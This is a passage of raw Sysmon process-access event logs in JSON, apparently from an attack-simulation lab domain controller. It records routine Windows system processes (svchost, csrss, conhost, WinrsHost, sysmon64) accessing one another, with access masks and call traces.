C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
